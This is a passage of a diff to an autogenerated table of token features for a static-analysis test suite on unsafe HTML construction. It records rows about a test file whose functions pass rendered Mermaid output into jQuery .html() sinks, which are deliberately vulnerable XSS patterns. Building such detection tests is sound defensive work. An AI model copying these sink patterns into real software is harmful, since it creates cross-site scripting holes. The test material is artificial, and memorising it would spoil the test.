autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:17 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:22 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:22 | $("#foo").html | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:22 | $("#foo").html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:22 | $("#foo").html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:22 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | $("#foo").html(svg) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | $("#foo").html(svg) | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | $("#foo").html(svg) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | $("#foo").html(svg) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | $("#foo").html(svg) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | exceptional return of $("#foo").html(svg) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | exceptional return of $("#foo").html(svg) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | exceptional return of $("#foo").html(svg) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | exceptional return of $("#foo").html(svg) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:9:100:27 | exceptional return of $("#foo").html(svg) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:11:100:16 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:11:100:16 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:11:100:16 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23434,6 +153653,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:11:100:16 | "#foo" | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:11:100:16 | "#foo" | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:11:100:16 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:19:100:22 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:19:100:22 | html | contextSurroundingFunctionParameters | (x)\n(svg) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:19:100:22 | html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:19:100:22 | html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:19:100:22 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:24:100:26 | svg | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:24:100:26 | svg | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:24:100:26 | svg | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23441,6 +153665,36 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:24:100:26 | svg | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:24:100:26 | svg | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:100:24:100:26 | svg | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:5 | $ | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:5 | $ | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:5 | $ | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:5 | $ | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:5 | $ | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | $("#foo") | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | exceptional return of $("#foo") | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | exceptional return of $("#foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | exceptional return of $("#foo") | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | exceptional return of $("#foo") | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:13 | exceptional return of $("#foo") | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:18 | $("#foo").html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:18 | $("#foo").html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:18 | $("#foo").html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:18 | $("#foo").html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:18 | $("#foo").html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | $("#foo ... d", x)) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | $("#foo ... d", x)) | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | $("#foo ... d", x)) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | $("#foo ... d", x)) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | $("#foo ... d", x)) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | exceptional return of $("#foo ... d", x)) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | exceptional return of $("#foo ... d", x)) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | exceptional return of $("#foo ... d", x)) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | exceptional return of $("#foo ... d", x)) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:5:103:45 | exceptional return of $("#foo ... d", x)) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:7:103:12 | "#foo" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:7:103:12 | "#foo" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:7:103:12 | "#foo" | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23448,6 +153702,26 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:7:103:12 | "#foo" | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:7:103:12 | "#foo" | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:7:103:12 | "#foo" | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:15:103:18 | html | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:15:103:18 | html | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:15:103:18 | html | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:15:103:18 | html | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:15:103:18 | html | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:28 | myMermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:28 | myMermaid | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:28 | myMermaid | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:28 | myMermaid | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:28 | myMermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:35 | myMermaid.render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:35 | myMermaid.render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:35 | myMermaid.render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:35 | myMermaid.render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:35 | myMermaid.render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | exceptional return of myMerma ... id", x) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | exceptional return of myMerma ... id", x) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | exceptional return of myMerma ... id", x) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | exceptional return of myMerma ... id", x) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | exceptional return of myMerma ... id", x) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | myMerma ... id", x) | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | myMerma ... id", x) | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | myMerma ... id", x) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | @@ -23455,6 +153729,11 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | myMerma ... id", x) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | myMerma ... id", x) | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:20:103:44 | myMerma ... id", x) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:30:103:35 | render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:30:103:35 | render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:30:103:35 | render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:30:103:35 | render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:30:103:35 | render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:37:103:40 | "id" | CalleeFlexibleAccessPath | myMermaid.render | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:37:103:40 | "id" | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:37:103:40 | "id" | calleeImports | mermaid | @@ -23473,6 +153752,31 @@ tokenFeatures | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:43:103:43 | x | enclosingFunctionName | usesCreateHTML | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:43:103:43 | x | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | | autogenerated/Xss/UnsafeHtmlConstruction/main.js:103:43:103:43 | x | receiverName | myMermaid | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:11 | mermaid | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:11 | mermaid | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:11 | mermaid | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:11 | mermaid | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:11 | mermaid | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:18 | mermaid.render | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:18 | mermaid.render | contextSurroundingFunctionParameters | (x) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:18 | mermaid.render | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:18 | mermaid.render | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:105:18 | mermaid.render | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | exceptional return of mermaid ... \\n }) | contextFunctionInterfaces | constructor(s)\ncreateHTML(x)\ncreatesClass(s)\ndoXss()\nguards(attrVal)\nintentionalTemplate(obj)\nplainDOMXMLParsing(s)\nsanitizedHTML(s)\ntypes(val)\nusesCreateHTML(x)\nusesCreateHTML(x)\nxssPlugin(options)\nxssThroughHTMLConstruction(s)\nxssThroughMarkdown(s)\nxssThroughMarkdown(s)\nxssThroughMoreComplexXMLParsing(s)\nxssThroughXMLParsing(s) | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | exceptional return of mermaid ... \\n }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | exceptional return of mermaid ... \\n }) | enclosingFunctionBody | x myMermaid render id x svg $ #foo html svg $ #foo html myMermaid render id x mermaid render id x svg $ #foo html svg $ #foo html mermaid render id x mermaid mermaidAPI render id x svg $ #foo html svg | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | exceptional return of mermaid ... \\n }) | enclosingFunctionName | usesCreateHTML | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | exceptional return of mermaid ... \\n }) | fileImports | ./jquery-plugin ./typed markdown-it mermaid striptags | +| autogenerated/Xss/UnsafeHtmlConstruction/main.js:105:5:107:6 | mermaid ... \\n }) | contextFunctionInterfaces | 